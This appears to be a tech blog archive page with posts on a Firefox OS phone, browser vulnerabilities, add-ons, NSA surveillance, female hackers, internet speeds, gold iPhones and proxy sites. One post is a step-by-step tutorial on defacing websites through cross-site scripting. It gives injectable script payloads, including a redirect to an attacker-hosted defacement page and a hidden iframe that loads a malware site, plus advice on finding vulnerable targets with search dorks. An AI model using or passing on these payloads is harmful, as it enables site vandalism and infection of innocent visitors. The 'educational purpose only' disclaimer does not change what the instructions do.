Disqus for Cyber Fort

Showing posts with label internet stuff. Show all posts
Showing posts with label internet stuff. Show all posts

Monday, 10 March 2014

$25 Smartphone by FireFox OS

Be The First To Comment


Mozilla is aiming squarely at the dominance of Google Android in the smartphone field by introducing the cheap smartphone with the FireFox OS on it. Mozilla unveiled the phone at a press event at the Mobile World Congress in Barcelona.
Mozilla partnered with chipmaker Spreadtrum to develop the smartphone that has a $25 suggested retail price. Even if it comes with a low price tag, the device still has some respectable specs. TechRadar got shipping unit of the device and reported that it has a single-core ARM Cortex-A5 chip clocked at 1 GHz backed by 256 MB of RAM. It also has a 2GB flash memory and a 3.5 inch display, along with a 2 megapixel camera.
The $25 smartphone from Mozilla is the ideal first smartphone for people who have not been able to afford other smartphone models according to Jay Sullivan, the chief operating officer of Mozilla. Sullivan was quoted by Bloomberg as saying,“we are about bringing people online.”
A cheap smartphone will be perfect for developing markets where internet penetration rates are not high yet. Smartphones can help people in these markets leapfrog the progression to getting access to the Internet and avoid purchasing personal computers or laptops just to connect to the Internet.
The cheap smartphone also appears to be Mozilla’s first push to stake its claim in the smartphone OS market which is dominated by Google’s Android OS. Q2 2013 data from IDC shows that Android had a smartphone market share of 79.3% while iOS had market share of 13.2%. Mozilla will most likely aim at breaking Linux’s market share, at least for the initial phase. Mozilla only needs to capture more than 0.8% which is Linux’s share in the smartphone OS market.
Smartphones Reduce the Digital Divide
One of the projections from
Ericsson’s ConsumerLab’s 10 Hot Consumer Trends 2014 is that smartphones will reduce the digital divide. The study found that people in Indonesia and India already primarily use smartphones for instant messaging and online banking. That is a big contrast to the U.S. and the U.K. where people are more likely to use their laptop for online banking. People also believe that mobile phones are the most important tool for carrying out daily activities. Ericsson’s study shows that 51% of people think about mobile phones this way.
Aside from offering cheap phones, there is also a need to address the other side of the equation and that means the infrastructure for connecting smartphones to the Internet. Telecommunication firms are doing their best to offer the 
<a href="http://www.moneyhero.com.hk/en/broadband">best broadband plans</a> 
to mobile consumers but there is more work that needs to be done. Facebook, for example, has the Internet.org project where they try to connect more people to the Internet and they are doing this by trying to bring down the cost to access the Internet. The Internet.org is aiming to connect 5 billion more people to the Internet.
Mozilla is not alone in trying to offer lower-priced smartphones to the market. Nokia, for example, has also introduced a new line of phones that run on the Google Android system that costs around $120. BlackBerry also unveiled the Z3 and the Canadian smartphone maker will sell the phone in Indonesia before selling it to other Southeast Asian countries.
There are also smaller handset makers that are making cheaper smartphones. ZTE from China is not as well-known as Nokia or Blackberry but they have been making cheap smartphones. In the Philippines, there is also Cherry Mobile that sells affordable smartphones. The race to offer cheaper smartphones is a good development for breaking down the digital divide in the world. These devices can help bring all of the benefits of having information at the tip of your hands to the rest of the world’s population that still do not have access to the Internet.

Read More

Sunday, 16 February 2014

Chrome, Firefox face threat of mischievous cyber attacks

Be The First To Comment

New Delhi: Multiple vulnerabilities have been detected in popular web browsers Google Chrome and Mozilla Firefox and cyber security sleuths have advised Internet users in the Indian cyberspace to guard against arbitrary activities on their systems.
In view of these suspicious virus-based activities, Internet users have been asked to upgrade their personal versions of these two most used web browsers on their work stations.

“Multiple vulnerabilities have been reported in Mozilla Firefox, Thunderbird and SeaMonkey which could be exploited by a remote attacker to bypass certain security restrictions, disclose potentially sensitive information, gain escalated privileges, execute arbitrary code and causes denial of service condition on the affected system,” the Computer Emergency Response Team of India (CERT-IN) said in its latest advisory to online users in the country.

The CERT-In is the nodal agency to combat hacking, phishing and to fortify security-related defences of the Indian Internet arena.

“The two web browsers are an important tool for Internet surfing among Indian online consumers. The anomalies have been detected recently and it would be advised that users upgrade their existing versions sooner than later. These activities are mischief on part of hackers or they are harmful viruses,” a cyber security expert told PTI.
The agency, in its advisory, said the vulnerability is caused “due to improper restrict access to ‘about:home’ buttons by script on other pages in Mozilla Firefox”.

“A user-assisted remote attacker could exploit this vulnerability using a crafted website or webpage. Successful exploitation of this vulnerability could allow user-assisted remote attacker to cause a denial of service condition,” the CERT-In said.
Similar issues have been reported in the popular browser offered by Google.

“Multiple vulnerabilities have been reported in Google Chrome which could be exploited by a remote attacker to cause denial of service condition or execute arbitrary code on the target system,” the agency said.

The maximum damage these vulnerabilities can cause, the advisory said, was memory corruption, unwanted downloading of files, loss of sensitive information (when Mozilla Firefox is used in Android phones) and cause of denial of various services on the Internet to the user.

The agency advised Internet users to either user proper security patches (Mozilla Firefox) or upgrade the browser version (Google Chrome).

The affected software systems include “Firefox versions prior to 27.0, Firefox extended support release (ESR) versions prior to 24.3, Thunderbird versions prior to 24.3, SeaMonkey versions prior to 2.24 and Google Chrome prior to version 32.0.1700.102".

Read More

Thursday, 13 February 2014

Top 10 Best Firefox Add-ons of 2014

Be The First To Comment
Firefox is one of the best browsers out there. If used correctly, the effect can be pretty awesome. Let's have a look below for 12 addons which can help you improve the usage of Mozilla Firefox.

1.Collusion:

allows you to see which sites are using third-party cookies to track your movements across the Web. It shows, in real time, how that data creates a spider web of interaction between companies and other trackers.

2.URL Fixer

corrects typos in URLs that you enter in the address bar. For example, if you type google.con, it will correct it to google.com (asking first, if you enable confirmation). One reviewer of this add-on says it’s a “huge time saver” — and who doesn’t need to save time?

3.PearlTrees.


Collect, organize and share everything you like with your new visual and social library. Pearltrees’ unique visual interface lets you have all your interests at hand and inspires you with other’s collections.

4.TwitBin.

It allows you to keep up with all of your Twitter conversations right from your browser sidebar. Send messages, receive messages, share links, and more

5.Memonic Web Clipper,

which lets you capture content snippets on any page and choose sections of websites to save, share and discuss with friends. Keep more than just links: Save the essential content snippets and use them on any computer or mobile. Memonic combines the advantages of bookmarks with your private online notebook

6. 365scores Notifier

lets you get all the scores, updates and other information about your favorite teams in real time.

7.Do Not Track Plus

Firefox already has a feature called Do Not Track, which allows you to tell Websites not to track your online activity

8. Cheevos for Firefox


Want to learn about Firefox and brag to your friends about your pro-level Web surfing? May’s add-on choice Cheevos for Firefox— gets you there. With this add-on you gain achievements for using Firefox, whether it’s finding hidden Easter eggs within the product, or taking advantage of the power of the browser. It makes using the web more fun

9.Tab Badge,

which gives an alert on any one of your open tabs letting you know when there’s something new on that page.

10. Fabtabs

It was a big hit with Firefox users. By taking a small screenshot of the website you are currently viewing, and calculating the most commonly used color from that screenshot, Fab Tabs tries to take the one essential color from the website and apply it to the tab to not only makes your tabs look fabulous, but to help you navigate your tabs visually.



You may downloads all the addons from here:
https://addons.mozilla.org/en-US/firefox/


Read More

Sunday, 8 December 2013

Attention: The NSA is Tracking Online Porn Viewers to Discredit

Be The First To Comment

Sitting on the wire, the NSA has the ability to track and make a record of every website you visit.  Today, the Huffington Post revealed that the NSA is using this incredible power to track who visits online porn websites, and to use this information to discredit those it deems dangerous. Their porn habits would then be "exploited to undermine a target's credibility, reputation and authority."   
The story was illustrated with six individuals, none of whom are designated terrorists themselves. Instead, they are deemed "radicalizers," people—two of which the NSA itself characterized as a "well-known media celebrity" and a "respected academic"—whose speeches and postings allegedly incite hatred or promote offensive jihad. 
The report raises the specter of abusing online viewing records to discredit other political opponents of the US government. The NSA document was reviewed not just by the NSA and counter-terrorism officials, but by entities like the Department of Commerce and the US Trade Representative. The USTR negotiates treaties (like the controversial Trans-Pacific Partnership), and one could certainly imagine that the leverage from this program could be useful in pushing for the US position. In fact, EFF and three dozen civil society groups have already asked the NSA to explain if they are spying on those advocating for the public interest in US trade policy.
Ed Snowden's latest revelation may leave SEC officials quaking as the NSA "has been gathering records of online sexual activity and evidence of visits to pornographic websites as part of a proposed plan to harm the reputations of those whom the agency believes are radicalizing others through incendiary speeches." Of course, as we have seen, this 'information' would never be used by the government for non-radical-terrorist suppressing reasons, as the ACLU notes, is is "an unwelcome reminder of what it means to give an intelligence agency unfettered access to individuals' most sensitive information using tactics associated with the secret police services of authoritarian governments."
Via Snowden...
The National Security Agency has been gathering records of online sexual activity and evidence of visits to pornographic websites as part of a proposed plan to harm the reputations of those whom the agency believes are radicalizing others through incendiary speeches, according to a top-secret NSA document.

The document, provided by NSA whistleblower Edward Snowden, identifies six targets, all Muslims, as “exemplars” of how “personal vulnerabilities” can be learned through electronic surveillance, and then exploited to undermine a target’s credibility, reputation and authority.

The NSA document, dated Oct. 3, 2012, repeatedly refers to the power of charges of hypocrisy to undermine such a messenger.”
Full ACLU Statement:
The NSA considered discrediting six people by revealing surveillance evidence of their online sexual activity, visits to pornography websites, and other personal information, according to a report today in The Huffington Post. The article cited documents leaked by former NSA contactor Edward Snowden. The targets of the NSA’s plan were all Muslims whom the NSA characterized as “radicals” but who were not believed to be involved in terrorism. The documents say one of the targets was a “U.S. person,” a term describing American citizens and legal permanent residents, but all of the targets were reportedly outside the United States.

American Civil Liberties Union Deputy Legal Director Jameel Jaffer had this reaction:

“This report is an unwelcome reminder of what it means to give an intelligence agency unfettered access to individuals' most sensitive information. One ordinarily associates these kinds of tactics with the secret police services of authoritarian governments. That these tactics have been adopted by the world’s leading democracy – and the world’s most powerful intelligence agency – is truly chilling.”

The administration keeps on attempting to justify the NSA spying by claiming there is oversight from the other branches of government. But, as Pentagon Papers whistleblower Daniel Ellsberg noted in the Why Care About NSA Spying video, spying makes a mockery of that separation. How can that oversight be meaningful if the NSA's huge storehouse of information contains the private viewing habits of every senator, representative, and judge? When the only protection against abuse is internal policies, there is no serious oversight. Congress needs to take action now to rein in the spying.


Read More

Monday, 25 November 2013

Top 5 Beautiful Female Hackers in the World

Be The First To Comment
Hacking has traditionally been a man’s world, but women are quietly breaking into the hacker subculture. Take a look at top 5 female hackers in the world.

1. Kristina Vladimirovna Svechinskaya



Kristina Svechinskaya, a New York University student is one of the most common names in the hacker’s world. She is Russian money mule maker who was arrested on November 2010 and accused of breaking into millions of dollars from several banks in Britain and America and for usage of multiple fake passports. Svechinskaya was dubbed "the world's sexiest computer hacker" for her raunchy, but casual appearance.


Svechinskaya used Zeus trojan horse to attack thousands of bank accounts along with nine others and opened at least five accounts in Bank of America and Wachovia to disburse the theft money. For all her hacking activities and for using the passports fraudulently it is said that she may have to pay huge penalty of 40 years of imprisonment. It is estimated that with nine other people Svechinskaya had skimmed $3 million in total.


2.Joanna Rutkowska

Joanna Rutkowska

Joanna Rutkowska is a Polish woman who is interested in the world of hacking security. Her name first became known as the Black Hat Briefings conference in Las Vegas, August 2006. Rutkowska presented during which the attack she had done to the security system windows vista. Not only that, Rutkowska also been attacked Trusted Execution Technology and Intel's System Management Mode. 

Early 2007 she formed Invisible Things Lab in Warsaw, Poland. A company that focuses on OS security research and consulting services as well VMM internet security. The year 2010 also Rutkowska with Rafal Wojtczuk form Qubes, an Operating System that is very full protect security. Rutkowska also open to advise Vice President of mikocok Security Technology Unit to further tighten the security system in windows vista. Waw, Rutkowska is a hacker who is very welcome to work with.


3. Ying Cracker

Ying Cracker

Cracker ying, a teacher from Shanghai China. SHe taught about the basic process of hacking guide, how to change the IP address or manipulate office password, wow!
She is also an expert in making software hackers.
In a forum titled Chinese Hackers Hottie, his name is much discussed and it makes its popularity gaining altitude. In the forum she's also got a lot of fans members. It was the beginning credibility soar.


4. Raven Alder

Raven Alder

Raven graduated from high school at the age of 14 and college at 18. She was the first woman to give a presentation at the DefCon hacker’s conference. Adler an half ISP engineer, half security geek, is a contributing author to several technical books, magazines and a frequent speaker at conferences She designs, tests and audits intrusion detection systems for large federal agencies. She has worked as a Senior Backbone Architect and Senior Security Consultant in IT security. Her interest in securing networks end-to-end has led her to examine and pioneer standards in the security of network infrastructure.




5. Xiao Tian 
 Xiao Tian
Xiao Tian, just out of her teenage became famous after forming China Girl Security Team, a group of hackers especially for woman which is China's largest today, the group has over 2,200 members. Tian created the now-infamous hacking team because she felt that there was no other outlet for teenage girls like herself in the male-dominated world of hacking. Its time to Move over male Asian nerdy computer geeks, female Asian nerdy computer geeks are here to stay.

Read More

Saturday, 23 November 2013

How to Deface Website with Cross Site Scripting

Be The First To Comment



Today i am gonna teach you how to deface the sites which has the XSS vulnerability .

IMP NOTE : : Never implement this technique. I am just explaining it for educational purpose only.

Defacing is one of the most common thing when the hacker found the vulnerability in website. 

Defacing is changing the content the website to Hacker content. 

Most of time, attacker use this technique to inform about the vulnerability to Admin. 

But it's bad idea..!

i have some easiest methods to deface the Xss vuln sites .. i will be teaching u one by one .

step :- 1  Script for changing the background Color of a website:

<script>document.body.bgColor="red";</script>

use this in your target website as

http://www.targetwebsite.com/<script>document.body.bgColor="red";</script>

step:- 2  Script for chaning the background image of a website:

<script>document.body.background="http://your_image.jpg/";</script>

step:- 3  Defacement Page with Pastehtml:

First of all upload some defacement page(html) to pastehtml.com and get the link.

When you find a XSS vulnerable site, then insert the script as :

<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>

This script will redirect the page to your pastehtml defacement page.

Note: You can deface only persistent XSS vulnerable sites.

step:- 4 Defacing with iframe Injection

What is an IFrame Injection?

Using IFrame tag, The Attackers injects the malware contain website(links) 

using Cross site Scripting in popular websites. 

So if the usual visitors of that popular sites opens the website, 

it will redirect to malware contain website. 

Malware will be loaded to your computer, now you are infected .

What an attacker can do with Iframe Injection?

Using Iframe Injection, an attacker can inject advertisements inside any other websites, 

insert malware infected site links, redirect to malware infected sites and more.

Iframe Injection Tutorial:

1.First of all attacker will find the Vulnerable websites using google dorks.

2. They test the vulnerability by inserting some iframe tag using the url.

3. then insert the Malicious Iframe code inside the webpage.

For Example:

he can insert this code using the url:

Code:

<iframe src=”http://malwarewebpages/web.html” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

For php webpages:

echo “<iframe src=\”http://malwarewebpages/web.html\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

I have just given some easy method only to deface the XSS affected page ..

It wil be NOOB friendly .. Still there are more methods to deface it..

please leave comment if u have any queries..and share this...

Read More

Monday, 4 November 2013

10 Best Countries Have Fastest Internet Connection

Be The First To Comment
The United States is home to some of the world’s most successful and innovative high-tech companies. Despite its techie pedigree, the U.S. doesn’t have the fastest Internet speed in the world. It doesn’t even crack the top 10.
image credit:-  onlycomputing.com
Hong Kong has the fastest average peak speed at 63.6 megabits per second, more than three times the global average of 18.4 Mbps, according to the latest quarterly report from Akamai Technologies. Japan holds the No. 2 spot with an average peak speed of 50 Mbps, followed by Romania with 47.9 Mbps, South Korea with 44.8 Mbps and Latvia with 44.2 Mbps.
The quarterly report, which is based on information from January through March, ranks countries based on average peak connection speeds as well as stats on mobile connectivity and attack traffic.
The U.S. comes in at No. 11 with 36.6 Mbps, double the global average, according to the report. The average peak speed in the U.S. has steadily improved, increasing 11 percent from the previous quarter.


The average peak connection speed also grew over the previous quarter, increasing 9.2 percent to 18.4 Mbps. Globally, 130 regions and countries saw higher average peak connection speeds with increases ranging from 0.9 percent in Nicaragua to 13.3 Mbps to 55 percent in Ghana to 21.3 Mbps, the report says.
Long term trends are heartening as well with the global average peak connection speed up 36 percent from the same period last year. Countries that saw yearly declines include a 3.8 percent decline in Guatemala to 15.6 Mbps and 28 percent drop in Sudan to 6.1 Mbps, the report says.



The lowest average peak connection speed in the first quarter was recorded in Iran at 3.2 Mbps, a 7.1 percent drop from the same quarter last year.
The U.S. fared better in terms of high broadband adoption rates with one quarter of the country’s connections above 10 megabits per second. South Korea took the top spot in that category with half of its connections at speeds above 10 Mbps. The global high broadband adoption rate grew to 13 percent above 10 Mbps, the report says..
above information by:- www.smartplanet.com

Read More

Sunday, 3 November 2013

The Gold Colour iPhone 5S Craze !

12 Comments



Check out our review of the Apple iPhone 5S smartphone.

Though not necessarily worth its weight in gold, a shortened supply in Apple’s new iPhone 

5S in luxurious gold is causing its price on sites like eBay creep up on sites like eBay at 

exorbitant prices.

One of Apple’s big highlights at its big press event about two weeks ago was 

the announcement of its brand new smartphone, the iPhone 5S. Of the three colors 

released, gold is the one that caught the most attention. Apple’s supply of gold iPhones 

was excessively low at launch, with some stores getting not a single golden iPhone, and 

even Apple’s own flagship store in San Francisco receiving only around 20.

Due to the short supply, many are turning to eBay and Craigslist to get their hands on their 
very own iPhone 5S, complete with a finish even Richie Rich could appreciate. An 

average 16GB Gold iPhone 5S can fetch nearly $1,000 from impatient iPhone fanatics – 

nearly 30 percent higher than an identical, though less flashy space-gray or silver. In 

China, golden iPhones are clocking in at nearly twice as much as their retail value.

As crazy as people may seem for picking up a golden iPhone for $1,000, all eyes are on 

that eBay auction where in just 24 hours a golden iPhone started at just 99 cents before 

ballooning to a crazy $10,100. However, this price is an anomaly. Someone with zero eBay 
feedback set a ridiculous $10,000 offer for the golden iPhone – and then someone else 

outbid him. The winning bidder has real eBay feedback, suggesting that perhaps he or she 

really wanted a $10,000 iPhone. There is a chance that the listing will get canceled by eBay.
Whether $1,000 or $10,000, the fact remains that stock has dwindled for the iPhone 5S, 

making some wait well into October for the latest Apple smartphone. Whether this is due 

to unexpected sales or artificial scarcity is unclear, but in either case Apple better hope it 

leads to a better earnings quarter as Samsung continues to steal the show.

Lastly, since we know some of you will be disappointed the new iPhone 5S lacks any real 

gold, remember you can always settle for the iPhone 5 featuring 24 karat gold, platinum, 

and Swarovski Crystals. Take your pick folks




Since the rumors for the gold iPhone 5C have popped up, the web has got filled with reports about whether the gold iPhone will be lucky or unlucky for Apple. Some reports have gone too far that they have even traced the luckiness of golden color in different countries as well. Details below.
Many analyses for the gold iPhone says that golden color is considered lucky in China and therefore this change to golden color might boost Apple’s sales in China. So let’s see what colors Chinese actually prefer.
As per the chart of auto colors compiled by Fortune’s Philip Elmer-DeWitt, the favorite or the lucky color of Chinese consumers (at least for buying autos) is silver, not gold. Even the second most favorite color is not gold. It is black. While golden color holds the eighth position, that doesn’t seem to be impressive enough. Well, does this mean that gold iPhone is not going to bring riches for the fruit company? Maybe no.
Golden color might bring fortunes for Apple in India. This is because gold is a traditional color there, due to the extensive use of gold jewelry, especially in weddings. So we can say that the significance of gold in India can give some fame to the golden-colored iPhone 5C.
However, there is one thing that might make people less attracted towards this gold iPhone and that is that there are already smartphones of other companies in golden color, then why would one choice gold iPhone? But since Apple’s products’, in particular iPhone is considered to be something more than just a smartphone, therefore those who want best gold smartphone might go for this one.
Do you think the gold coloured iPhone will be a success?


Read More

Thursday, 31 October 2013

Top 10 Proxy WebSites To Unblock Any Site

Be The First To Comment
If you have a slow connection to a certain website, or can’t access it at all because of the restriction of your ISP, workplace or school, or simply desired to protect yourself online by hiding your private information, then an online proxy website will help you.
With the assistance of an online proxy service, you do not access your target website( e.g. Facebook ) directly, you make a request, the web proxy fetch the web page( and encrypt its content, remove scripts and advertisements ), and send it back to your browser. This makes it possible to unblock any banned site, or surf any site anonymously without leaving your footprint.
image credit www.techroadies.com
While surfing online, sometimes we come across websites which can’t be accessed due to our location or IP restrictions. Have you ever noticed this type of problem while browsing websites? This happens usually because the owner of website restricts access of website to only specific IP addresses. Sometimes they also block IP ranges of whole country so that no one from that country can access their website or content.  The other reason can be that your internet connection provider restricts access to specific websites.Similarly  most of the USA based websites are not available in other countries.
In order to access blocked websites, you will need a proxy server that automatically randomize your IP address and will assign a different IP address of another country to you. So, if your IP address is of USA, then you will be able to access websites that are blocked in your country and their access is only limited to US users. For example, YouTube is blocked in Pakistan and now only option for opening YouTube in Pakistan is with proxy. There are also some Google chrome extensions that can help you open YouTube and other blocked websites with the help of proxy. Most of the time in colleges, universities and offices etc. internet access is restricted to only specific websites. So, in order to unblock other websites, you can use proxy websites or softwares.
If you do not want to go through installation of Proxy softwares then anonymous browsing with proxy websites is the best option for you. So, in this article I am sharing a list of 5 best free Proxy websites of 2013 that will let you surf internet anonymously and securely.

1. 000FreeProxy

2. kkProxy

3. MyAddr

4. RX Proxy


5. AnonyMouse


6. Zend2


7. NewIPNow


8. KProxy


9. Mega Proxy


10. AD Free Proxy


all the image credit http://myappmag.com







Read More